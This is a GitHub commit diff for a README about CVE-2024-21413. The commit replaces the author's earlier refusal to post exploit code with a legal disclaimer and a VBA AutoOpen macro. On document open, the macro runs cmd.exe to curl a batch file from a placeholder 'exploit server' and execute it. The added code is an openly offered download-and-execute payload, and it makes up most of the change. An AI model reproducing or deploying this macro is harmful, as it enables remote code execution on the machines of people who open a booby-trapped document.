Skip to content

Commit

Permalink
Update README.MD
Browse files Browse the repository at this point in the history
  • Loading branch information
nu11secur1ty authored Mar 22, 2024
1 parent 758e95f commit 0cb278b
Showing 1 changed file with 6 additions and 1 deletion.
7 changes: 6 additions & 1 deletion 2024/CVE-2024-21413/README.MD
Original file line number Diff line number Diff line change
Expand Up @@ -16,8 +16,13 @@ STATUS: MEDIUM-HIGH Vulnerability

## Exploit:
The exploit can be deployed on a remote attacking server, as you can see on the second [video](https://youtu.be/zxrlV8lgoB0?si=YrTOR3wk_QLuABbd).
I am not posting a code because these two exploits are generally dangerous, and I am not responsible if someone finds them and breaks someone's system.
I am not responsible if someone breaks someone's system. You will respond FRONT OF THE LAW!

```
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s https://path_to_your_exploit_server.bat > PoC.bat && .\PoC.bat", vbNormalFocus)
End Sub
```

## Proof and Exploit - video:
[href](https://www.youtube.com/watch?v=7gNq2sxh9J0)
Expand Down

0 comments on commit 0cb278b

Please sign in to comment.